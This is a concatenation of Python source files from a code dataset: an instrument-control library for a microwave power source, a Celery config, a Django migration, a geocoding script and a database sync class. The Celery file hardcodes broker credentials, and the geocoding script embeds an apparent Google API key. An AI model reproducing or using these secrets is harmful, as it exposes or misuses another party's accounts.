from previous rf sweep\n\n    Example::\n\n        data = mps.rfsweepdata()\n\n    '''\n\n    returnDataRfSweep = send_command('rfsweepdata?',recv = True)\n    returnDataRfSweep = returnDataRfSweep.rstrip()\n    returnDataRfSweep = np.fromstring(returnDataRfSweep,sep=',')\n    returnValues = returnDataRfSweep.astype(int)\n\n    return returnValues\n\ndef rfsweepdosweep():\n    '''Start single RF Sweep.\n\n    Example::\n\n        mps.rfsweepdosweep()\n\n    '''\n\n    send_command('rfsweepdosweep?')\n\ndef rfsweeppower(tunePower = None):\n    '''Set/Query Power for RF Sweep\n\n    Args:\n        tunePower (None, float, int): If not None, sets the rf sweep power to this value in dBm. 
Otherwise queries the current rf sweep power.\n\n    Returns:\n        float: If tunePower argument is None, the current rf sweep power.\n\n    Example::\n    \n        mps.rfsweeppower(15) # set rf sweep power to 15 dBm\n        tunePower = mps.rfsweeppower()\n\n    '''\n\n    if tunePower is not None:\n        if not isinstance(tunePower,(int,float)):\n            raise ValueError('Value must be an int or float')\n        tunePower = tunePower * 10\n        tunePowerString = str(int(tunePower))\n        send_command('rfsweeppower %s'%tunePowerString)\n    else:\n        tunePowerString = send_command('rfsweeppower?', recv = True)\n        tunePower = float(tunePowerString) / 10.\n\n        return tunePower\n\ndef rfsweepnpts(rfSweepNptsValue = None):\n    ''' Set/query number of points in RF sweep\n\n    Args:\n        rfSweepNptsValue (int): Set number of points in RF sweep. If None, the number of points is queried\n\n    Returns:\n        int: If rfSweepNptsValue argument is None, the number of points in the rf sweep\n\n    Example::\n    \n        pts = rfsweepnpts() # query the number of points in rf sweep\n        rfsweepnpts(100) # set the number of points in rf sweep to 100\n\n    '''\n    if rfSweepNptsValue is not None:\n        if not isinstance(rfSweepNptsValue,int):\n            raise ValueError('Value must be an int')\n        send_command('rfsweepnpts %s'%rfSweepNptsValue)\n    else: # Query\n        returnRfSweepNpts = send_command('rfsweepnpts?',recv = True)\n        returnRfSweepNpts = int(returnRfSweepNpts)\n        return returnRfSweepNpts\n\ndef rfsweepdwelltime(dwellTime = None):\n    '''RF sweep dwell time in us\n\n    Args:\n        dwellTime: If dwellTime is not None, value to set the RF sweep dwell time in us\n\n    Returns:\n        float: If dwellTime is None, the current value of the rf sweep dwell time in us.\n\n    Example::\n\n        rfsweepdwelltime(50) # set rf sweep dwell time to 50 us\n        dwellTime = rfsweepdwelltime() # Query the rf sweep dwell time\n\n    '''\n\n    if dwellTime is not None:\n        if not isinstance(dwellTime,(int,float)):\n            raise ValueError('Value must be an int or float')\n        dwellTimeString = str(dwellTime)\n        send_command('rfsweepdwelltime %s'%dwellTimeString)\n    else:\n        dwellTimeString = send_command('rfsweepdwelltime?', recv = True)\n        dwellTime = float(dwellTimeString)\n\n        return dwellTime\n\ndef rfsweepinitialdwelltime(dwellTime = None):\n    '''RF sweep dwell time in ms for the first point\n\n    Args:\n        dwellTime: If dwellTime is not None, value to set the RF sweep dwell time for the first point in ms\n\n    Returns:\n        float: If dwellTime is None, the current value of the RF sweep dwell time for the first point in ms.\n\n    Example::\n\n        mps.rfsweepinitialdwelltime(100) # Set the dwell time for the first point to 100 ms\n        dwellTime = mps.rfsweepinitialdwelltime() # Query the dwell time for the first point in ms\n\n    '''\n\n    if dwellTime is not None:\n        if not isinstance(dwellTime,(int,float)):\n            raise ValueError('Value must be an int or float')\n        dwellTimeString = str(dwellTime)\n        send_command('rfsweepinitialdwelltime %s'%dwellTimeString)\n    else:\n        dwellTimeString = send_command('rfsweepinitialdwelltime?', recv = True)\n        dwellTime = float(dwellTimeString)\n\n        return dwellTime\n\ndef rfsweepsw(rfSweepSwValue = None):\n    ''' Set/query predefined RF sweep width (MHz)\n\n    +-----------+----------------------------+\n    | rfsweepsw | Value                      |\n    +===========+============================+\n    | 0         | 250 MHz                    |\n    +-----------+----------------------------+\n    | 1         | 100 MHz                    |\n    +-----------+----------------------------+\n    | 2         | 50 MHz                     |\n    +-----------+----------------------------+\n    | 3         | 10 MHz                     |\n    +-----------+----------------------------+\n\n    Args:\n        rfSweepSwValue (int): rfsweepsw variable which determines the rf sweep width. 
If None, the sweep width is queried\n\n    Returns:\n        int: rf sweep width\n\n    Example::\n\n        mps.rfsweepsw(0) # set rf sweep width to 250 MHz\n        sweepWidth = mps.rfsweepsw() # Query current rf sweep width\n\n    '''\n\n    if rfSweepSwValue is not None:\n        if not isinstance(rfSweepSwValue,int):\n            raise ValueError('Value must be an int')\n        send_command('rfsweepsw %s'%rfSweepSwValue)\n    else: # Query\n        returnRfSweepSw = send_command('rfsweepsw?',recv = True)\n        returnRfSweepSw = int(returnRfSweepSw)\n        return returnRfSweepSw\n\ndef rxdiodesn():\n    '''Query serial number of Rx diode\n\n    Returns:\n        serialNumberRx (str): Serial number string of Rx diode\n    '''\n    serialNumberRx = send_command('rxdiodesn?',recv = True)\n    return serialNumberRx\n\ndef rxpowerdbm():\n    '''Query the Rx diode reading in dBm\n\n    Returns:\n        rxPower (float): Receiver monitor power reading in dBm\n\n    Example::\n\n        rxPower = rxpowerdbm() # Query Rx diode power reading\n\n    '''\n    return_tenth_rx_dbm = send_command('rxpowerdbm?',recv = True)\n    rxPower = float(return_tenth_rx_dbm) / 10. # convert to dBm\n    return rxPower\n\ndef rxpowermv():\n    '''Query the Rx diode reading in mV\n\n    Returns:\n        rxVoltage (float): Receiver monitor voltage reading in mV\n\n    Example::\n\n        rxVoltage = rxpowermv() # Query Rx diode voltage\n\n    '''\n    return_tenth_rx_mv = send_command('rxpowermv?',recv = True)\n    rxVoltage = float(return_tenth_rx_mv) / 10. # convert to mV\n    return rxVoltage\n\ndef screen(screenState = None):\n    '''Set/Query Screen Status\n\n    +--------------+----------------+\n    | screen       | Description    |\n    +==============+================+\n    | 0            | Main Screen    |\n    +--------------+----------------+\n    | 1            | Operate Screen |\n    +--------------+----------------+\n    | 2            | Sweep Screen   |\n    +--------------+----------------+\n    | 3            | Advanced Screen|\n    +--------------+----------------+\n\n    Args:\n        screenState (None, int): If screenState is not None, sets the screen state\n\n    Returns:\n        screenStateReading (int): If screenState is None, returns the screen state\n\n    Example::\n\n        screenState = screen() # Query the Screen Status\n\n        screen(0) # Set Screen to Main Screen\n        screen(1) # Set Screen to Operate Screen\n        screen(2) # Set Screen to Sweep Screen\n        screen(3) # Set Screen to Advanced Screen\n\n    '''\n\n    if screenState is not None:\n        if screenState in (0,1,2,3):\n            send_command('screen %i'%screenState)\n        else:\n            raise ValueError('Screen Status is not Valid')\n    else:\n        screenStateReadingString = send_command('screen?',recv = True)\n        screenStateReading = int(screenStateReadingString)\n        return screenStateReading\n\ndef send_command(command, recv = False):\n    '''Send string command to python MPS server\n\n    Args:\n        command (str): string command to be sent to MPS Server\n        recv (bool): True if serial port should be read after writing. 
False by default.\n\n    Returns:\n        recv_string (str): if recv = True, returns string received from MPS Server\n\n    Example::\n\n        send_command('freq 9300000') # Set Frequency to 9.3 GHz\n\n        freqStringkHz = send_command('freq?',recv = True) # Query the microwave frequency in kHz\n        freqValue = float(freqStringkHz) / 1.e6 # Convert frequency string to float in units of GHz\n\n        send_command('_stop_') # Stop the python server\n\n    '''\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((HOST,PORT))\n\n    send_string = '%s\\n'%command\n\n    # specify string as utf-8\n    send_bytes = send_string.encode('utf-8')\n\n    # send bytes to server\n    s.sendall(send_bytes)\n\n    # serial delay\n    time.sleep(serialDelay)\n\n    if recv:\n        recv_bytes = s.recv(1024)\n        recv_string = recv_bytes.decode('utf-8')\n        recv_string = recv_string.rstrip()\n\n        s.close()\n\n        return recv_string\n    else:\n        s.close()\n\ndef serialNumber():\n    '''Query serial number of MPS\n\n    Returns:\n        serialNumber (str): Serial number string of MPS\n    '''\n    serialNumberString = send_command('serial?',recv = True)\n    return serialNumberString\n\ndef set_host(host):\n    global HOST\n    HOST = host\n\ndef set_port(port):\n    global PORT\n    PORT = port\n\ndef start(serialPort = None, host = None, port = None, debug = False):\n\n    '''Start python TCP server\n\n    Args:\n        serialPort (None, str): If given, serial port to establish MPS connection.\n        host (None, str): If given, the IP address to use for the server\n        port (None, int): If given, the port to use for the server\n\n    Example::\n\n        start() # Start python server with automatically detected serial port or default serial port (defined in configuration file)\n\n        start('COM5') # Start python server using \"COM5\" as serial port\n    '''\n    # Need HOST and PORT to be global\n    global HOST\n    global PORT\n\n    args = []\n    if serialPort is not None:\n        args += [serialPort]\n    elif autoDetectSerialPort:\n        serialPort = detectMPSSerialPort()\n        if serialPort is None:\n            print('\\nCannot automatically connect to MPS.\\nPlease specify COM Port manually.')\n            return\n        args += [serialPort]\n\n    if host is None:\n        host = HOST\n    args += [host]\n\n    if port is None:\n        port = PORT\n    args += [str(port)]\n    \n    HOST = host\n    PORT = port\n    print()\n    print('--- Server Parameters ---')\n    print('Serial Port: %s'%serialPort)\n    print('HOST: %s'%host)\n    print('PORT: %s'%port)\n    print('-------------------------')\n    print()\n\n    if debug:\n        print('Starting Subprocess')\n        if os.name == 'nt':\n            p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n                    stdout=subprocess.PIPE, \n                    stderr=subprocess.STDOUT,\n                    shell = True,\n                    creationflags = subprocess.DETACHED_PROCESS)\n        else:\n            p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n                    stdout=subprocess.PIPE,\n                    start_new_session = True)\n\n    else:\n        if os.name == 'nt':\n            p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n                    stdout=subprocess.PIPE, \n                    stderr=subprocess.STDOUT)\n        else:\n            p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n                    stdout=subprocess.PIPE)\n    \n    print('Server starting...')\n\n    serverErrorIndicator = test()\n    errorCounter = 0\n\n    while (serverErrorIndicator != 0):\n        \n        time.sleep(1.)\n        serverErrorIndicator = test()\n        print('Server Error Code: %s'%serverErrorIndicator)\n        errorCounter += 1\n\n        if (p.poll() is not None) or (errorCounter >= 5):\n            print()\n            print('Server failed to start.')\n            print()\n            print('Please visit the Troubleshooting section of the ')\n            print('online documentation at pyB12MPS.bridge12.com for')\n            print('more 
information.')\n            print()\n            return\n\n    if serverErrorIndicator == 0:\n        print('Server started.')\n\n    print('MPS initializing...')\n\n    ### Check for MPS Initialization ###\n    if initializeOnStart:\n        open()\n\ndef stop():\n    '''Stop python server \n    '''\n    send_command('_stop_')\n\n    serverErrorIndicator = test()\n    errorCounter = 0\n\n    while (serverErrorIndicator == 0):\n        time.sleep(0.1)\n        serverErrorIndicator = test()\n        errorCounter += 1\n\n        if (errorCounter >= 50):\n            print('Failed to stop server.')\n            break\n\n    if serverErrorIndicator != 0:\n        print('Server stopped.')\n\ndef systemReady():\n    '''Query python server for initialized status of MPS\n\n    +-----------+--------------------------------------+\n    |isMPSReady |Description                           |\n    +===========+======================================+\n    |0          |MPS Serial Connection Not Initialized |\n    +-----------+--------------------------------------+\n    |1          |MPS Serial Connection Initialized     |\n    +-----------+--------------------------------------+\n    \n    Returns:\n        isMPSReady (int): MPS initialization status\n    '''\n    isMPSReady = send_command('_is_system_ready_',recv = True)\n    isMPSReady = int(isMPSReady.rstrip())\n    return isMPSReady\n\ndef systemstatus():\n    '''Returns dictionary of MPS status\n\n    +--------------------------------------+\n    |Keys                                  |\n    +======================================+\n    |freq                                  |\n    +--------------------------------------+\n    |power                                 |\n    +--------------------------------------+\n    |rxpowermv                             |\n    +--------------------------------------+\n    |txpowermv                             |\n    +--------------------------------------+\n    |rfstatus                              |\n    +--------------------------------------+\n    |wgstatus                              |\n    +--------------------------------------+\n    |ampstatus                             |\n    +--------------------------------------+\n    |amptemp                               |\n    +--------------------------------------+\n    |lockstatus                            |\n    +--------------------------------------+\n    |screen                                |\n    +--------------------------------------+\n\n\n    Returns:\n        dict: dictionary of system status variables\n    '''\n    systemStatusString = send_command('systemstatus?',recv = True)\n\n    systemStatusList = systemStatusString.rstrip().split(',')\n\n    systemStatusDict = {}\n\n    for statusInfo in systemStatusList:\n        key, value = tuple(statusInfo.split(':'))\n\n        systemStatusDict[key] = value\n\n    systemStatusDict['freq'] = float(systemStatusDict['freq']) / 1.e6\n    systemStatusDict['power'] = float(systemStatusDict['power']) / 10.\n    systemStatusDict['rxpowermv'] = float(systemStatusDict['rxpowermv']) / 10.\n    systemStatusDict['txpowermv'] = float(systemStatusDict['txpowermv']) / 10.\n    systemStatusDict['rfstatus'] = int(systemStatusDict['rfstatus'])\n    systemStatusDict['wgstatus'] = int(systemStatusDict['wgstatus'])\n    systemStatusDict['ampstatus'] = int(systemStatusDict['ampstatus'])\n    systemStatusDict['amptemp'] = float(systemStatusDict['amptemp']) / 10.\n    systemStatusDict['lockstatus'] = int(systemStatusDict['lockstatus'])\n    systemStatusDict['screen'] = int(systemStatusDict['screen'])\n\n    return systemStatusDict\n\ndef test():\n    '''Test Server Connection\n\n    Returns:\n        serverErrorIndicator: A value of zero (0) indicates normal operation of the server. 
Any other value indicates a server error.\n    '''\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    serverErrorIndicator = s.connect_ex((HOST,PORT))\n    s.close()\n    return serverErrorIndicator\n\ndef trig():\n    '''Output Trigger pulse from MPS\n\n    Example::\n\n        trig()\n\n    '''\n    send_command('trig')\n\ndef triglength(length = None):\n    '''Set/Query trigger pulse length in us\n\n    Args:\n        length (None, float, int): If given, the length of the trigger pulse in us. If None, queries the trigger pulse length.\n\n    Returns:\n        (int) trigger pulse length in us.\n\n    Example::\n\n        triglength(100) # Set trigger pulse length to 100 us\n        triglength() # query the trigger pulse length\n\n    '''\n    if length is None:\n        length = send_command('triglength?', recv = True)\n        length = int(length)\n        return length\n    else:\n        if (length > 0) and (length <= 10000000):\n            send_command('triglength %i'%length)\n        else:\n            raise ValueError('Trigger length must be positive and less than or equal to 10 seconds.')\n\ndef txdiodesn():\n    '''Query serial number of Tx diode\n    \n    Returns:\n        serialNumberTx (str): Serial number string of Tx diode\n    '''\n    serialNumberTx = send_command('txdiodesn?',recv = True)\n    return serialNumberTx\n\ndef txpowerdbm():\n    ''' Returns transmitter power monitor in dBm\n\n    Returns:\n        txPower (float): Transmitter power monitor reading in dBm\n\n    Example::\n\n        txPower = txpowerdbm() # Query Tx diode power reading\n\n    '''\n    return_tenth_tx_dbm = send_command('txpowerdbm?',recv = True)\n    txPower = float(return_tenth_tx_dbm) / 10. # convert to dBm\n    return txPower\n\ndef txpowermv():\n    ''' Returns transmitter power monitor in mV\n\n    Returns:\n        txVoltage (float): Transmitter power monitor voltage in mV\n\n    Example::\n\n        txVoltage = txpowermv() # Query Tx diode voltage\n\n    '''\n    return_tenth_tx_mv = send_command('txpowermv?',recv = True)\n    txVoltage = float(return_tenth_tx_mv) / 10. 
# convert to mV\n    return txVoltage\n\ndef wgstatus(wgStatus = None):\n    ''' Set/Query the waveguide switch (wg) status\n\n    +--------+-----------------------------------+\n    |wgStatus|Description                        |\n    +========+===================================+\n    |0       |Disable Waveguide Switch (EPR Mode)|\n    +--------+-----------------------------------+\n    |1       |Enable Waveguide Switch (DNP Mode) |\n    +--------+-----------------------------------+\n\n    Args:\n        wgStatus (None, int): wg status value\n\n    Returns:\n        wgStatusReading (int): If wgStatus is None, returns the queried wg status\n\n    Example::\n\n        wgState = wgstatus() # Query the Waveguide State\n\n        wgstatus(0) # Switch to EPR Mode\n        wgstatus(1) # Switch to DNP Mode\n\n    '''\n    if wgStatus is not None:\n        if wgStatus in (0,1):\n            send_command('wgstatus %i'%wgStatus)\n        else:\n            raise ValueError('WG Status Not Valid')\n    else:\n        wgStatusReadingString = send_command('wgstatus?',recv = True)\n        wgStatusReading = int(wgStatusReadingString)\n        return wgStatusReading\n\nif __name__ == '__main__':\n    pass\n", "sub_path": "pyB12MPS/pyB12MPS.py", "file_name": "pyB12MPS.py", "file_ext": "py", "file_size_in_byte": 31828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports.tools.list_ports.comports", "line_number": 127, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.tools", "line_number": 127, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports", "line_number": 127, "usage_type": "name"}, {"api_name": "serial.tools.list_ports.tools.list_ports.comports", "line_number": 220, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.tools", "line_number": 220, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.fromstring", "line_number": 450, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 710, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 710, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 710, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 722, "usage_type": "call"}, {"api_name": "os.name", "line_number": 801, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 802, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 802, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 803, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 804, "usage_type": "attribute"}, {"api_name": "subprocess.DETACHED_PROCESS", "line_number": 806, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 808, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 808, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 809, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 813, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 814, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 814, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 815, "usage_type": "attribute"}, {"api_name": 
"subprocess.STDOUT", "line_number": 816, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 818, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 818, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 819, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 828, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 861, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 951, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 951, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 951, "usage_type": "attribute"}]} +{"seq_id": "604652", "text": "from setuptools import setup, find_packages\n\n\ndef parse_requirements(filename):\n \"\"\"\n load requirements from a pip requirements file\n \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\nreqs = parse_requirements('requirements.txt')\n\nsetup(name='pyx_%name%_pytorch',\n version='0.0.1',\n description='PYX module',\n url='',\n author='PYX Team',\n author_email='support@pyx.ai',\n packages=find_packages(),\n install_requires=reqs,\n zip_safe=False)\n", "sub_path": "pyx_cli/boilerplates/general/pytorch/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "199472840", "text": "from celery import Celery\nfrom untitled.app.utils import get_plugins_modules\n\n# celery -A untitled.app.workflow_manager.celery_workflow_manager worker --pool=eventlet --loglevel=info\n\napp = Celery('app',\n broker='amqp://willian:0502@localhost/wvhost',\n backend='amqp://willian:0502@localhost/wvhost',\n include=['untitled.app.workflow_manager.celery_workflow_manager'])\n\n# Optional configuration, see the application user guide.\n\napp.conf.update(\n result_expires=3600,\n)\n\nif __name__ == '__main__':\n app.start()\n", "sub_path": "untitled/app/workflow_manager/celery.py", "file_name": "celery.py", "file_ext": "py", "file_size_in_byte": 554, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "celery.Celery", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "167892148", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Picture',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('file', models.ImageField(upload_to='')),\n ('title', models.CharField(max_length=100)),\n ('size', models.IntegerField(default=0)),\n ('loaded', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='UserInform',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(default='', max_length=100)),\n ('password', models.CharField(default='', max_length=100)),\n ],\n 
),\n migrations.AddField(\n model_name='user',\n name='userInform',\n field=models.ForeignKey(to='lookat.UserInform'),\n ),\n migrations.AddField(\n model_name='picture',\n name='user',\n field=models.ForeignKey(to='lookat.User'),\n ),\n ]\n", "sub_path": "picturehosting/lookat/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "213544281", "text": "import requests\n\nresponse = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address=AMI Stadium&key=AIzaSyD3QNXpAktAJq6pH_vqOU0-2bHJWEAFOAo')\n\n\n# In[62]:\n\n\ndata = response.json()\n\n\n# In[63]:\n\n\ndata\n\n\n# 
In[15]:\n\n\nprint(type(data))\n\n\n# In[16]:\n\n\ndata.items()\n\n\n# In[17]:\n\n\ndict.keys()\n\n\n# In[22]:\n\n\ndata.keys()\n\n\n# In[21]:\n\n\ndata['results'][0]\n\n\n# In[23]:\n\n\ndata.keys()\n\n\n# In[30]:\n\n\ntype(data['results'])\n\n\n# In[49]:\n\n\ndata['results'][0]['address_components'][0]['long_name']\n\n\n# In[50]:\n\n\ndata['results'][0]['address_components'][1]['long_name']\n\n\n# In[51]:\n\n\ndata['results'][0]['address_components'][2]['long_name']\n\n", "sub_path": "Automation/scrapy-project/cricket_stadium/read_data_geocoding_api.py", "file_name": "read_data_geocoding_api.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "306066456", "text": "from const import const\nimport threading\nimport logging\nfrom Utils.Helper import *\n\n\nclass BaseModel(threading.Thread):\n def __init__(self, mapping):\n super(BaseModel, self).__init__()\n self.mapping = mapping\n logging.basicConfig(filename='pvn.log', level=logging.ERROR, format=\"%(asctime)s - %(message)s\",\n datefmt=\"%Y/%m/%d %H:%M:%S\")\n\n def insert_into_oracle(self, fields_mapping, key_field='id', m_dates=None, m_fmap=None, lob_fields=None, del_fields=None):\n with OracleInstance(**const.ORACLE_DB, dict_result=False) as db:\n last_timestamp = db.query_one(\"SELECT max(update_time) FROM {}\".format(self.mapping[1]))[0]\n if last_timestamp:\n # 如果存在历史数据每次添加增量\n self.update(last_timestamp, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields)\n else:\n # 如果不存在历史数据直接全选更新\n self.init(fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields)\n\n def init(self, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields):\n print('init {}'.format(self.mapping[1]))\n select_sql = \"SELECT * FROM {} ORDER BY updatetime\".format(self.mapping[0])\n with MySQLInstance(**const.MYSQL_DB, dict_result=1) as mdb:\n mdb.execute(select_sql)\n paras = mdb.query_one()\n with OracleInstance(**const.ORACLE_DB, dict_result=True) as odb:\n i = 1\n while paras:\n insert_sql = format_insert_sql(self.mapping[1], fields_mapping, m_fmap)\n paras = format_paras(paras, m_dates, m_fmap, del_fields)\n try:\n # print(\"{} --- {}\".format(i, paras[key_field]))\n odb.execute_with_clob(insert_sql, lob_fields, params=paras)\n except Exception as e:\n logging.error(\"{}.{}\".format(self.mapping[1], paras[key_field]))\n logging.exception(e)\n if i & 0b100000000000000:\n odb.commit()\n i = 0\n i = i + 1\n paras = mdb.query_one()\n odb.commit()\n print('init {} complete'.format(self.mapping[1]))\n\n def update(self, last_timestamp, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields):\n select_sql = \"SELECT * FROM {} WHERE updatetime>='{}' ORDER BY updatetime\".format(self.mapping[0], last_timestamp)\n with MySQLInstance(**const.MYSQL_DB, dict_result=2) as mdb:\n results = mdb.query(select_sql)\n print('update {} with last_timestamp({}), count: {}'.format(self.mapping[1], last_timestamp, results.__len__()))\n with OracleInstance(**const.ORACLE_DB, dict_result=True) as odb:\n i = 1\n for paras in results:\n key_id = odb.query_one(\"SELECT {} FROM {} WHERE {}='{}'\".format(key_field, self.mapping[1], key_field, paras[key_field]))\n # 1.如果存在update\n if key_id:\n sql = format_update_sql(self.mapping[1], fields_mapping, key_field, key_id[0], m_fmap)\n # 2.如果不存在insert\n else:\n sql = format_insert_sql(self.mapping[1], 
fields_mapping, m_fmap)\n try:\n # print(\"{} --- {}\".format(i, paras[key_field]))\n paras = format_paras(paras, m_dates, m_fmap, del_fields)\n odb.execute_with_clob(sql, lob_fields, params=paras)\n except Exception as e:\n logging.error(\"{}.{}\".format(self.mapping[1], paras[key_field]))\n logging.exception(e)\n if i & 0b10000000000000:\n odb.commit()\n i = 0\n i = i + 1\n odb.commit()\n print('update {} complete'.format(self.mapping[1]))\n", "sub_path": "Pvn/Models/BaseModel.py", "file_name": "BaseModel.py", "file_ext": "py", "file_size_in_byte": 4005, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "threading.Thread", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 11, "usage_type": "attribute"}, {"api_name": "const.const.ORACLE_DB", "line_number": 15, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 15, "usage_type": "name"}, {"api_name": "const.const.MYSQL_DB", "line_number": 27, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 27, "usage_type": "name"}, {"api_name": "const.const.ORACLE_DB", "line_number": 30, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 40, "usage_type": "call"}, {"api_name": "const.const.MYSQL_DB", "line_number": 51, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 51, "usage_type": "name"}, {"api_name": "const.const.ORACLE_DB", "line_number": 54, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 54, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 